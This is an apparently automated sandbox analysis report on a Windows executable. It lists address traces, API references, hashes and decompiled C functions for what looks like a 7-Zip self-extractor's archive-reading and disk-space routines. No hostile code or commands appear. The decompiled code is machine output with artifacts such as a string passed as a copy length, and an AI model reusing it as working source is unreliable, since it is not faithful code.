0x00000000
0x00000000
0x00414782
0x0041470d
0x00414710
0x00414716
0x00414719
0x0041471b
0x00414720
0x00414720
0x00414723
0x00414726
0x00414728
0x0041472d
0x0041472d
0x00414730
0x00414733
0x00414735
0x0041473a
0x0041473a
0x00414740
0x00414745
0x00414748
0x0041474a
0x0041474f
0x0041474f
0x00414752
0x00414755
0x00414757
0x0041475c
0x0041475c
0x0041475f
0x00000000
0x004146b5
0x004146b5
0x004146bb
0x00000000
0x00000000
0x004146bd
0x004146bf
0x00414784
0x00414784
0x00414787
0x0041478c
0x00414790
0x00414790
0x00414792
0x0041479b
0x0041479b
0x00000000
0x00414792
0x004146cf
0x004146d1
0x004146d4
0x004146da
0x004146dd
0x004146df
0x004147af
0x004147af
0x004147b1
0x004147b6
0x004147b6
0x004147b9
0x004147b9
0x004147b9
0x00000000
0x004147b9
0x00000000
0x004146e5
0x004146b3
0x004145f7
0x004145f7
0x004145fa
0x004145fc
0x00414601
0x00414601
0x00414604
0x00414607
0x00414609
0x0041460e
0x0041460e
0x00414614
0x00414619
0x0041461c
0x0041461e
0x00414623
0x00414623
0x00414626
0x00414629
0x0041462b
0x00414634
0x00414634
0x0041439d
0x0041439d
0x00000000
0x00414537
0x00414537
0x0041453a
0x0041453d
0x0041454a
0x00414551
0x00414555
0x00414558
0x00414558
0x00414559
0x00414562
0x00414565
0x00414568
0x0041456b
0x0041456b
0x0041456c
0x0041456f
0x00414572
0x00000000
0x00000000
0x00414574
0x00414578
0x00414581
0x0041457a
0x0041457a
0x0041457a
0x00414584
0x0041458a
0x0041458d
0x00000000
0x0041458f
0x0041458f
0x00414592
0x00000000
0x00000000
0x00414595
0x00000000
0x00414595
0x0041458d
0x0041459a
0x0041459a
0x0041459d
0x004145a0
0x004145a3
0x004145a6
0x004145a9
0x00000000
0x00000000
0x004145b7
0x004145c1
0x004145c4
0x004145c4
0x00000000
0x004145a3
0x00414531
0x004144bc
0x004144be
0x004144c3
0x004144c3
0x004144c6
0x004144c9
0x004144cb
0x004144d0
0x004144d0
0x004144d6
0x004144db
0x004144de
0x004144e0
0x004144e5
0x004144e5
0x004144e8
0x004144eb
0x004144ed
0x004144f6
0x004144f6
0x00000000
0x004144ed
0x00414474
0x00414476
0x0041447b
0x0041447b
0x0041447e
0x00414481
0x00414483
0x00414488
0x00414488
0x0041448e
0x00414493
0x00414496
0x00414498
0x0041449d
0x0041449d
0x004144a0
0x004144a3
0x004144a5
0x004144aa
0x004144aa
0x004144ad
0x00000000
0x004144ad
0x0041439a
0x00000000
0x004142f5
0x004142f7
0x004142fc
0x004142fc
0x004142ff
0x004142ff
0x004148bb
0x004148be
0x004148cc
0x004148cc

APIs

_EH_prolog.MSVCRT ref: 004142AC
??2@YAPAXI@Z.MSVCRT ref: 004143A6
??2@YAPAXI@Z.MSVCRT ref: 004143F8
??3@YAXPAX@Z.MSVCRT ref: 004146D4
??3@YAXPAX@Z.MSVCRT ref: 00414710
??3@YAXPAX@Z.MSVCRT ref: 00414787
??3@YAXPAX@Z.MSVCRT ref: 004147A6

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$H_prolog
String ID:
API String ID: 417953191-0
Opcode ID: 6e5d5291a4617bce83337eb540cc18d02c5ea9b3a787491fa99610c5aa7076dc
Instruction ID: dbdf76550d0dacf37412834ceff7b264cc003af6efdd9b10b87399beb13a8ea4
Opcode Fuzzy Hash: 6e5d5291a4617bce83337eb540cc18d02c5ea9b3a787491fa99610c5aa7076dc
Instruction Fuzzy Hash: EF123D74600249DFCB14DF68C984AEA77B5BF89354F24416EF81A8B391DB39EC81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004158B1, Relevance: 7.6, APIs: 5, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004158B1(void* __ecx, void* __eflags, intOrPtr* _a4, void* _a8) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __esi;
				void* _t39;
				void* _t40;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t48;
				void* _t49;
				intOrPtr* _t53;
				void* _t57;
				void* _t59;
				void* _t65;
				void* _t69;
				void* _t72;
				void* _t74;
				void* _t76;
				void* _t78;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;

				_t74 = __ecx;
				_t76 = __ecx + 0x50;
				_t39 = E00412C23(__eflags, _a4, _t76, 0x20); // executed
				_t84 = _t83 + 0xc;
				if(_t39 == 0) {
					_t40 = E004155C0(_t76);
					if(_t40 == 0) {
						_t57 = _a8;
						__eflags = _t57;
						if(_t57 == 0) {
							L8:
							_push(0x8000); // executed
							L00418686(); // executed
							_v8 = _t40;
							memcpy(_t40, _t76, "true");
							_v20 = _v20 & 0x00000000;
							_t85 = _t84 + 0x10;
							_t8 =  &_v16;
							 *_t8 = _v16 & 0x00000000;
							__eflags =  *_t8;
							while(1) {
								_t69 = 0x7fe0;
								__eflags = _t57;
								if(_t57 == 0) {
									goto L14;
								}
								_t48 =  *_t57 - _v20;
								asm("sbb ecx, [ebp-0xc]");
								__eflags =  *(_t57 + 4);
								if(__eflags > 0) {
									goto L14;
								}
								if(__eflags < 0) {
									L13:
									_t69 = _t48;
									__eflags = _t48;
									if(_t48 == 0) {
										L31:
										_t78 = 1;
										__eflags = 1;
										L32:
										_push(_v8);
										L00418674();
										_t44 = _t78;
										L6:
										return _t44;
									}
									goto L14;
								}
								__eflags = _t48 - 0x7fe0;
								if(_t48 >= 0x7fe0) {
									goto L14;
								}
								goto L13;
								L14:
								_t42 = _a4;
								_v12 = _v12 & 0x00000000;
								_t43 =  *((intOrPtr*)( *_t42 + 0xc))(_t42, _v8 + 0x20, _t69,  &_v12);
								__eflags = _t43;
								if(_t43 != 0) {
									L34:
									_t78 = _t43;
									goto L32;
								}
								_t65 = _v12;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L31;
								}
								_t59 = 0;
								__eflags = 0;
								while(1) {
									_t45 = _v8;
									_t80 = _t45 + _t59 + 1;
									_t72 = _t65 + _t45;
									__eflags = _t80 - _t72;
									if(_t80 > _t72) {
										break;
									} else {
										goto L18;
									}
									while(1) {
										L18:
										__eflags =  *_t80 - 0x37;
										if( *_t80 == 0x37) {
											break;
										}
										__eflags =  *(_t80 + 1) - 0x37;
										if( *(_t80 + 1) == 0x37) {
											_t80 = _t80 + 1;
											break;
										}
										__eflags =  *(_t80 + 2) - 0x37;
										if( *(_t80 + 2) == 0x37) {
											_t80 = _t80 + 2;
											break;
										}
										__eflags =  *(_t80 + 3) - 0x37;
										if( *(_t80 + 3) == 0x37) {
											_t80 = _t80 + 3;
											__eflags = _t80;
											break;
										}
										_t80 = _t80 + 4;
										__eflags = _t80 - _t72;
										if(_t80 <= _t72) {
											continue;
										}
										break;
									}
									__eflags = _t80 - _t72;
									if(_t80 > _t72) {
										break;
									}
									_t59 = _t80 - _t45;
									_t49 = E004155C0(_t80);
									__eflags = _t49;
									if(_t49 != 0) {
										memcpy(_t74 + 0x50, _t80, 0x20);
										asm("adc eax, [ebp-0xc]");
										 *((intOrPtr*)(_t74 + 0x40)) =  *((intOrPtr*)(_t74 + 0x40)) + _t59 + _v20;
										asm("adc [edi+0x44], eax");
										_t53 = _a4;
										_t82 =  *((intOrPtr*)(_t74 + 0x40)) + 0x20;
										__eflags = _t82;
										asm("adc edi, ecx");
										_t43 =  *((intOrPtr*)( *_t53 + 0x10))(_t53, _t82,  *((intOrPtr*)(_t74 + 0x44)), 0, 0);
										goto L34;
									}
									_t65 = _v12;
								}
								_v20 = _t65 + _v20;
								asm("adc dword [ebp-0xc], 0x0");
								memmove(_t45, _t65 + _t45, 0x20);
								_t57 = _a8;
								_t85 = _t85 + 0xc;
							}
						}
						_t40 =  *_t57 |  *(_t57 + 4);
						__eflags = _t40;
						if(_t40 != 0) {
							goto L8;
						}
						_t44 = _t40 + 1;
						__eflags = _t44;
						goto L6;
					}
					return 0;
				}
				return _t39;
			}

0x004158b9
0x004158bd
0x004158c4
0x004158c9
0x004158ce
0x004158d0
0x004158d7
0x004158de
0x004158e1
0x004158e3
0x004158f4
0x004158f4
0x004158f9
0x00415902
0x00415905
0x0041590a
0x0041590e
0x00415911
0x00415911
0x00415911
0x00415915
0x00415915
0x0041591a
0x0041591c
0x00000000
0x00000000
0x00415920
0x00415926
0x00415929
0x0041592b
0x00000000
0x00000000
0x0041592d
0x00415933
0x00415933
0x00415935
0x00415937
0x004159d4
0x004159d6
0x004159d6
0x004159d7
0x004159d7
0x004159da
0x004159e0
0x004158ed
0x00000000
0x004158ed
0x00000000
0x00415937
0x0041592f
0x00415931
0x00000000
0x00000000
0x00000000
0x0041593d
0x0041593d
0x00415942
0x00415953
0x00415956
0x00415958
0x00415a1e
0x00415a1e
0x00000000
0x00415a1e
0x0041595e
0x00415961
0x00415963
0x00000000
0x00000000
0x00415965
0x00415965
0x00415967
0x00415967
0x0041596a
0x0041596e
0x00415971
0x00415973
0x00000000
0x00000000
0x00000000
0x00000000
0x00415975
0x00415975
0x00415975
0x00415978
0x00000000
0x00000000
0x0041597a
0x0041597e
0x00415995
0x00000000
0x00415995
0x00415980
0x00415984
0x00415998
0x00000000
0x00415998
0x00415986
0x0041598a
0x0041599d
0x0041599d
0x00000000
0x0041599d
0x0041598c
0x0041598f
0x00415991
0x00000000
0x00000000
0x00000000
0x00415993
0x004159a0
0x004159a2
0x00000000
0x00000000
0x004159a6
0x004159a8
0x004159ad
0x004159af
0x004159ee
0x004159fb
0x004159fe
0x00415a04
0x00415a0a
0x00415a12
0x00415a12
0x00415a16
0x00415a1b
0x00000000
0x00415a1b
0x004159b1
0x004159b1
0x004159b6
0x004159bb
0x004159c3
0x004159c9
0x004159cc
0x004159cc
0x00415915
0x004158e7
0x004158e7
0x004158ea
0x00000000
0x00000000
0x004158ec
0x004158ec
0x00000000
0x004158ec
0x00000000
0x004158d9
0x004158f1

APIs

??2@YAPAXI@Z.MSVCRT ref: 004158F9
memcpy.MSVCRT ref: 00415905
memmove.MSVCRT ref: 004159C3
??3@YAXPAX@Z.MSVCRT ref: 004159DA
memcpy.MSVCRT ref: 004159EE

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@memmove
String ID:
API String ID: 2603872330-0
Opcode ID: 2a83ab7d57ec9051f100b4bb8f3d129306ca207a0fa469708c917177badb3b72
Instruction ID: 433c63e83c6a976a998f5bf3fc362b2ef9c66178bd8d618a58dbee1136051886
Opcode Fuzzy Hash: 2a83ab7d57ec9051f100b4bb8f3d129306ca207a0fa469708c917177badb3b72
Instruction Fuzzy Hash: 6341E6B1E10711EBEB24DA65C884BEFB7B4FF85324F14406BD80997241E778AD81C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00417397, Relevance: 4.7, APIs: 3, Instructions: 221COMMON

Download Yara Rule

APIs

Part of subcall function 00414A40: ??3@YAXPAX@Z.MSVCRT ref: 00414A70
Part of subcall function 00414A40: ??3@YAXPAX@Z.MSVCRT ref: 00414A81

??2@YAPAXI@Z.MSVCRT ref: 00417500
??3@YAXPAX@Z.MSVCRT ref: 00417522
??3@YAXPAX@Z.MSVCRT ref: 00417669

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@
String ID:
API String ID: 4113381792-0
Opcode ID: ee5b721849fbb08d6824c872e4f73ec142a1570e7f4365b3354bd37f0a4aea8f
Instruction ID: 31829f6316d0085e28ab0663c721532026a799b1362d8b1eeeedf023855baa97
Opcode Fuzzy Hash: ee5b721849fbb08d6824c872e4f73ec142a1570e7f4365b3354bd37f0a4aea8f
Instruction Fuzzy Hash: 27919F70A0464AEFCF25DFA5C580AEEFBB1BF08304F10452EE45993711D738AA90DB89

Uniqueness

Uniqueness Score: -1.00%

Function 00403B4F, Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00403B4F(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				char _v28;
				char _v40;
				void* _t17;
				void* _t23;
				void* _t36;

				_t36 = __edx;
				E00410F2D(E00410F2D(_t17,  &_v40),  &_v28);
				E00411391(__ebx,  &_v40, _a4);
				E00411391(__ebx,  &_v28, _a8);
				_t23 = E00403AF9( &_v40, 0x41e7a8, _t36,  &_v40);
				_t40 = _a12;
				if(_a12 != 0) {
					E00411362( &_v16, _t36, _t40, L"7z");
					E004113E9( &_v16, _t40, _a4);
					_t23 = E00403B4F(__ebx, _t36, _t40, _v16, _a8, 0); // executed
					_push(_v16);
					L00418674();
				}
				_push(_v28);
				L00418674();
				_push(_v40);
				L00418674();
				return _t23;
			}

0x00403b4f
0x00403b60
0x00403b6b
0x00403b76
0x00403b84
0x00403b89
0x00403b8d
0x00403b97
0x00403ba2
0x00403baf
0x00403bb4
0x00403bb7
0x00403bbc
0x00403bbf
0x00403bc2
0x00403bc7
0x00403bca
0x00403bd2

APIs

Part of subcall function 00410F2D: ??2@YAPAXI@Z.MSVCRT ref: 00410F35

Part of subcall function 00411391: ??2@YAPAXI@Z.MSVCRT ref: 004113B9
Part of subcall function 00411391: ??3@YAXPAX@Z.MSVCRT ref: 004113C2

Part of subcall function 00403AF9: ??2@YAPAXI@Z.MSVCRT ref: 00403AFE

??3@YAXPAX@Z.MSVCRT ref: 00403BC2
??3@YAXPAX@Z.MSVCRT ref: 00403BCA

Part of subcall function 00403B4F: ??3@YAXPAX@Z.MSVCRT ref: 00403BB7

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@
String ID:
API String ID: 4113381792-0
Opcode ID: b79d2a3cdc188176ffed56ad7b24aedc8b0e10b864975b4c1a1badbe0e5cc965
Instruction ID: ba998fed5371ac0f4b26c0078afaba92c5baa71843f49120b0c2fa06d41fa0b4
Opcode Fuzzy Hash: b79d2a3cdc188176ffed56ad7b24aedc8b0e10b864975b4c1a1badbe0e5cc965
Instruction Fuzzy Hash: 3201C83180010DAADF05BB96CC57AEDBB75AF14308F10416EB525310F2DB7AAB99DA48

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDC, Relevance: 3.9, APIs: 3, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00401BDC(void* __eax, void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				void* _v8;
				void* __ebx;
				intOrPtr* _t24;
				intOrPtr* _t31;
				void* _t32;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t39;
				void* _t48;
				void* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				void* _t72;
				intOrPtr _t80;

				_t64 = __edx;
				_push(__ecx);
				_push(0x160);
				L00418686();
				_t48 = 0;
				if(__eax == 0) {
					_t66 = 0;
					__eflags = 0;
				} else {
					_t66 = E00415228(__eax);
				}
				if(_t66 != _t48) {
					 *((intOrPtr*)( *_t66 + 4))(_t66);
				}
				_t69 = _a4;
				_v8 = _t48;
				 *((intOrPtr*)( *_t69 + 0x10))(_t69, _t48, _t48, _t48, _t48);
				_t24 =  *((intOrPtr*)( *_t69))(_t69, 0x41a3b0,  &_v8);
				if(_t24 != _t48) {
					L10:
					_t80 =  *0x41e6d0; // 0x0
					_push(((0 | _t80 != 0x00000000) - 0x00000001 & 0xfffffff5) + 0x13);
					_push(_t48);
					E00408E03(_t64);
					goto L11;
				} else {
					_push(0xc);
					L00418686();
					if(_t24 == _t48) {
						_t24 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t24 + 4)) = 0x41c098;
						 *((intOrPtr*)(_t24 + 8)) = _t48;
						 *_t24 = 0x41a5c0;
						 *((intOrPtr*)(_t24 + 4)) = 0x41a5b0;
					}
					_t36 = E0040126F(_t66, _v8, 0x41b548, _t24);
					if(_t36 == _t48) {
						__eflags =  *0x41e7e4 - 2;
						_t71 = _a8;
						if(__eflags == 0) {
							L18:
							_push(0x44);
							L00418686();
							__eflags = _t36 - _t48;
							if(__eflags != 0) {
								_t48 = E004017E5(_t36, __eflags);
							}
							E004016D1(_v8); // executed
							_t38 = E0040143B(_t48, _t48, _t64, __eflags, _t66,  *_t71); // executed
							_t72 = _t38;
							_t39 = _v8;
							__eflags = _t39;
							if(_t39 != 0) {
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
							__eflags = _t66;
							if(_t66 != 0) {
								 *((intOrPtr*)( *_t66 + 8))(_t66);
							}
							_t32 = _t72;
						} else {
							_t36 = E0040341E(_t64, __eflags,  *_t71); // executed
							__eflags = _t36;
							if(_t36 == 0) {
								L11:
								_t31 = _v8;
								if(_t31 != _t48) {
									 *((intOrPtr*)( *_t31 + 8))(_t31);
								}
								if(_t66 != _t48) {
									 *((intOrPtr*)( *_t66 + 8))(_t66);
								}
								_t32 = 0x80004005;
							} else {
								goto L18;
							}
						}
					} else {
						goto L10;
					}
				}
				return _t32;
			}

0x00401bdc
0x00401bdf
0x00401be3
0x00401be8
0x00401bed
0x00401bf2
0x00401bff
0x00401bff
0x00401bf4
0x00401bfb
0x00401bfb
0x00401c03
0x00401c08
0x00401c08
0x00401c0b
0x00401c15
0x00401c18
0x00401c27
0x00401c2b
0x00401c6a
0x00401c6c
0x00401c7c
0x00401c7d
0x00401c7e
0x00000000
0x00401c2d
0x00401c2d
0x00401c2f
0x00401c37
0x00401c52
0x00401c52
0x00401c39
0x00401c39
0x00401c40
0x00401c43
0x00401c49
0x00401c49
0x00401c5e
0x00401c68
0x00401ca3
0x00401caa
0x00401cad
0x00401cbb
0x00401cbb
0x00401cbd
0x00401cc3
0x00401cc5
0x00401cce
0x00401cce
0x00401cd3
0x00401cde
0x00401ce3
0x00401ce5
0x00401ce8
0x00401cea
0x00401cef
0x00401cef
0x00401cf2
0x00401cf4
0x00401cf9
0x00401cf9
0x00401cfc
0x00401caf
0x00401cb1
0x00401cb7
0x00401cb9
0x00401c85
0x00401c85
0x00401c8a
0x00401c8f
0x00401c8f
0x00401c94
0x00401c99
0x00401c99
0x00401c9c
0x00000000
0x00000000
0x00000000
0x00401cb9
0x00000000
0x00000000
0x00000000
0x00401c68
0x00401d02

APIs

??2@YAPAXI@Z.MSVCRT ref: 00401BE8
??2@YAPAXI@Z.MSVCRT ref: 00401C2F
??2@YAPAXI@Z.MSVCRT ref: 00401CBD

Part of subcall function 0040341E: lstrlenW.KERNEL32(00401CB6,00000000,0040652F,00000000,?,?,?,?,00401CB6,0040652F,?,0040652F,?,0041E754), ref: 0040342B
Part of subcall function 0040341E: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00401CB6,?,?,?,?,00401CB6,0040652F,?,0040652F,?,0041E754), ref: 00403497
Part of subcall function 0040341E: GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,00401CB6,0040652F,?,0040652F,?,0041E754), ref: 0040349E
Part of subcall function 0040341E: ??3@YAXPAX@Z.MSVCRT ref: 00403552

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$FileTime$??3@AttributesSystemlstrlen
String ID:
API String ID: 3424079290-0
Opcode ID: 976e45b185915056a8f99a203164cc7f1014fab9d33fbc42a9c6d1e6e5cfdf1c
Instruction ID: 7e773fba9f4f28f48e2618d037e94e5c52d4811739c016df22b7b1946ec67d51
Opcode Fuzzy Hash: 976e45b185915056a8f99a203164cc7f1014fab9d33fbc42a9c6d1e6e5cfdf1c
Instruction Fuzzy Hash: 4631C072244104AFEB109FA4CCC9D6E77A9EF45354728447FF405EB2A1EB38DD809B18

Uniqueness

Uniqueness Score: -1.00%

Function 00401120, Relevance: 3.0, APIs: 2, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401120(void* __ebx, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				union _ULARGE_INTEGER _v12;
				int _t13;
				void* _t19;
				void* _t23;
				void* _t26;

				_t19 = __ebx;
				_push(_t20);
				if(( *0x41e734 & 0x00000001) != 0) {
					L8:
					SendMessageW( *0x41e7d0, 0x8001, 0,  &_a8);
					__eflags = 0;
					return 0;
				}
				_t13 = GetDiskFreeSpaceExW( *0x41e754,  &_v12, 0, 0); // executed
				if(_t13 == 0) {
					goto L8;
				}
				_t26 = _v8 - _a12;
				if(_t26 > 0) {
					goto L8;
				}
				if(_t26 < 0) {
					L5:
					if(E00408D96(_t19, _t23, _t27, E004025A3(0x2a)) == 1) {
						 *0x41e734 =  *0x41e734 | 0x00000001;
						__eflags =  *0x41e734;
						goto L8;
					}
					 *0x41e6cc = 0x6a;
					return 0x80004005;
				}
				_t27 = _v12.LowPart - _a8;
				if(_v12.LowPart >= _a8) {
					goto L8;
				}
				goto L5;
			}

0x00401120
0x00401124
0x0040112c
0x00401184
0x00401195
0x0040119b
0x00000000
0x0040119b
0x0040113c
0x00401144
0x00000000
0x00000000
0x00401149
0x0040114c
0x00000000
0x00000000
0x0040114e
0x00401158
0x0040116a
0x0040117d
0x0040117d
0x00000000
0x0040117d
0x0040116c
0x00000000
0x00401176
0x00401153
0x00401156
0x00000000
0x00000000
0x00000000

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 0040113C
SendMessageW.USER32(00008001,00000000,?), ref: 00401195

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: 4a9ad5c13b21368c9b8a4a18aeeefad57b894845b1e2952334358444ccb03304
Instruction ID: eeea3185ef7ee4b8ec42ae40e13816a1ac5dd236df43a04d9bce504619b8d175
Opcode Fuzzy Hash: 4a9ad5c13b21368c9b8a4a18aeeefad57b894845b1e2952334358444ccb03304
Instruction Fuzzy Hash: 65014B74200209BBEB089B51ED46F9A37A9EB05704F508036FA11FA2F0DA79D9508B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00411391, Relevance: 3.0, APIs: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00411391(void* __ebx, signed int* __ecx, intOrPtr _a4) {
				signed int _t17;
				signed int _t29;
				signed int _t31;
				signed int* _t33;
				void* _t36;

				_t33 = __ecx;
				_t31 = E00401D03(_a4);
				_t36 = _t31 - _t33[2];
				if(_t36 > 0) {
					_t29 = 2;
					_t17 = (_t31 + 1) * _t29;
					_push( ~(0 | _t36 > 0x00000000) | _t17); // executed
					L00418686(); // executed
					_push( *_t33);
					L00418674();
					 *_t33 = _t17;
					_t33[2] = _t31;
				}
				_t33[1] = _t31;
				E00410BC4( *_t33, _a4, _t31 + 1);
				return _t33;
			}

0x00411397
0x0041139e
0x004113a1
0x004113a4
0x004113ab
0x004113af
0x004113b8
0x004113b9
0x004113be
0x004113c2
0x004113c9
0x004113cb
0x004113ce
0x004113cf
0x004113da
0x004113e6

APIs

??2@YAPAXI@Z.MSVCRT ref: 004113B9
??3@YAXPAX@Z.MSVCRT ref: 004113C2

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 2e665df6672da35839170e756a8474d5ceec529e695a452fea71b4484c6ab972
Instruction ID: 13779e98a26ef901db8b38e3872920c5ea5ff2c6e0af09d3cb48b63619ff7d3c
Opcode Fuzzy Hash: 2e665df6672da35839170e756a8474d5ceec529e695a452fea71b4484c6ab972
Instruction Fuzzy Hash: A3F0E9736083006FC3359F2AE846D5BFBD5EFC4320714892FF19982260DA36A890C654

Uniqueness

Uniqueness Score: -1.00%

Function 0041084B, Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041084B(void** __ecx, long _a4, long _a8, long _a12, intOrPtr* _a16) {
				long _v8;
				long _t11;
				intOrPtr* _t13;
				void* _t14;
				long _t23;

				_push(__ecx);
				_v8 = _a8;
				_t11 = SetFilePointer( *__ecx, _a4,  &_v8, _a12); // executed
				_t23 = _t11;
				if(_t23 != 0xffffffff || GetLastError() == 0) {
					asm("adc edx, eax");
					_t13 = _a16;
					 *_t13 = 0 + _t23;
					 *((intOrPtr*)(_t13 + 4)) = _v8;
					_t14 = 1;
				} else {
					_t14 = 0;
				}
				return _t14;
			}

0x0041084e
0x00410858
0x00410867
0x0041086d
0x00410872
0x0041088b
0x0041088d
0x00410890
0x00410892
0x00410895
0x0041087e
0x0041087e
0x0041087e
0x00410899

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 00410867
GetLastError.KERNEL32(?,?,?,?), ref: 00410874

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 112092caf3819af5e6393743fcf507a8ad03d7636a5f6438319894d123cb9087
Instruction ID: eb7d2d05a1a046451e7bd18addc87dcca9952f611384897ff70b9544da73ec3f
Opcode Fuzzy Hash: 112092caf3819af5e6393743fcf507a8ad03d7636a5f6438319894d123cb9087
Instruction Fuzzy Hash: 52F09071604104AF8F04EF68DC049DB3BE9AF49364B108166E819D7351D630DE51EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040181C, Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040181C(void* __ecx) {
				intOrPtr* _t7;
				void* _t14;
				intOrPtr* _t15;

				_t14 = __ecx;
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L00418674(); // executed
				_t7 =  *((intOrPtr*)(__ecx + 0x24));
				if(_t7 != 0) {
					_t7 =  *((intOrPtr*)( *_t7 + 8))(_t7);
				}
				_push( *((intOrPtr*)(_t14 + 0x10)));
				L00418674();
				_t15 =  *((intOrPtr*)(_t14 + 0xc));
				if(_t15 != 0) {
					return  *((intOrPtr*)( *_t15 + 8))(_t15);
				}
				return _t7;
			}

0x0040181d
0x0040181f
0x00401822
0x00401827
0x0040182d
0x00401832
0x00401832
0x00401835
0x00401838
0x0040183d
0x00401843
0x00000000
0x00401848
